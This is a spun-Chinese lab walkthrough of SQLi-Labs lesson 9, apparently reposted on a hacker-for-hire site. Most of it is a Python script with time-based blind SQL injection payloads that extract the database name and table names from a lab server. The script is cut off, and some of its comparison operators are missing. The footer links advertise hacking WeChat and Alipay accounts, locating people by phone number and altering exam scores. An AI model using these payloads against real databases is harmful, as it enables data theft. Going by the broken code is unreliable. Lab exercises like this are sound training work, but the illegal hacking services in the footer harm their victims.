安全科普:SQLi Labs 攻略(Part 3)

访客5年前黑客文章1317

建立环境:xp sp3虚拟机+xampp
运用东西:firefox浏览器+hackbar插件+tamper data插件+Cookie Editor插件
第九课:GET – Blind – Time based – Single Quotes(依据时刻-单引号-盲注)
这一课咱们发现,加不加单引号页面回来的信息都是相同的。


看一下代码。公然,不管输入是什么,回来的成果都是相同的。这儿就要运用依据时刻的盲注办法了。

在mysql中if(condition,A,B)表明当condition为true时,回来;当condition为false时,回来B。因而咱们能够结构下面的查询。假如数据库名的之一个字母ascii值大于120,则当即回来成果;不然10秒之后才回来成果。

咱们当然能够这样手艺猜解数据库名,表名,列名……也能够自己编写脚原本完结。经过sqli-labs学习sql注入——根底应战之less1-10这篇博客中给出了第八课的python脚本,我稍稍修改了一下来完结第九课。
#-*-coding:utf-8-*-
"""
@version:
@author: giantbranch
@file: blindsqlinjection.py
@time: 2019/5/1
"""
import time
import urllib
import urllib2
index = "0"
getTable = "users"
url = "http://192.168.153.129/sqli-labs/Less-9/?id=1"
database = "database()"
selectDB = "(select database())"
selectTable = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"
asciiPayload = "' and if(ascii(substr(%s,%d,1))>=%d,0,sleep(0.1)) #"
lengthPayload = "' and if(length(%s)>=%d,0,sleep(0.1)) #"
selectTableCountPayload = "' and if((select count(table_name) from information_schema.tables where table_schema='%s')>=%d,0,sleep(0.1)) #"
selectTableNameLengthPayloadfront = "'and if((select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d,0,sleep(0.1)) #"
#发送恳求,依据页面的回来时刻的判别长度的猜想成果
#string:猜想的字符串;payload:运用的payload;length:猜想的长度
def getLengthResult(payload, string, length):
    print payload % (string, length)
    finalUrl = url + urllib.quote(payload % (string, length))
    s1=time.time()
    res = urllib2.urlopen(finalUrl)
    s2=time.time()
    if s2-s1 0.08:
        return True
    else:
        return False
#发送恳求,依据页面的回来时刻的判别字符的猜想成果
#payload:运用的payload;string:猜想的字符串;pos:猜想字符串的方位;ascii:猜想的ascii
def getResult(payload, string, pos, ascii):
    finalUrl = url + urllib.quote(payload % (string, pos, ascii))
    s1 = time.time()
    res = urllib2.urlopen(finalUrl)
    s2 = time.time()
    if s2 - s1 0.08:
        return True
    else:
        return False
#注入
def inject():
    #猜数据库长度
    lengthOfDBName = getLengthOfString(lengthPayload, database)
    print "length of DBname: " + str(lengthOfDBName)
    #猜数据库称号
    DBname = getName(asciiPayload, selectDB, lengthOfDBName)
    print "current database:" + DBname
    #猜数据库中的表的个数
    tableCount = getLengthOfString(selectTableCountPayload, DBname)
    print "count of table:" + str(tableCount)
    for i in xrange(0, tableCount):
        num = str(i)
        #猜当时表的长度
        selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
        tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)

[1] [2] [3] [4] [5] [6] [7]  黑客接单网

相关文章

浅谈弱口令的损害

故事要从一次困难的浸透测验说起(以下事例均为授权测验),实践证明,要想进行一次完美的浸透,网站缝隙跟弱口令更配! 简介 一般以为简单被别人(他们有可能对你很了解)猜测到或被破解东西破解的口令均为弱口令...

浸透测验中的Node.js——使用C++插件躲藏实在代码

在之前的文章《浸透测验中的Node.js——Downloader的完成》开源了一个运用Node.js完成Downloader的代码,扼要剖析在浸透测验中的运用思路。 Node.js的语法简略易懂,所以...

加密压缩包,淘宝找黑客改护师考试成绩,看门狗2如何找黑客

图15 GFSK解调脚本作业图左翻右翻,经过了一系列困难的电焊拆解和吹风机刮除维护膜后,总算找到了担任射频通讯的芯片和担任逻辑的主控芯片,并辨认出了它们的类型。 看得出来大疆对电路板故意做了一些防拆解...

API 渗透测试从入门到精通系列文章(上)-黑客接单平台

这是关于运用 Postman 进行浸透测验系列文章的榜首部分。我本来计划只发布一篇文章,但最终发现内容太多了,假如不把它分红几个部分的话,很或许会让读者手足无措。 所以我的计划是这样的: 在这篇文章中...

it技术网站,求银行卡黑客高手联系方式,找黑客盗微信

这个API:api.spreaker.com/crossdomain.xml也存在缝隙,所以我一起还看了下developers.spreaker.com,这里有发现了:9、用发掘机假如不共同阐明存在C...

出售手机号码,黑客手机号定位联系人,找黑客查支付宝实名

@Override真的如各路大神们说的这样吗? /// 直线数据库并输出表格 /// </summary> -e界说到那个字符串就中止生...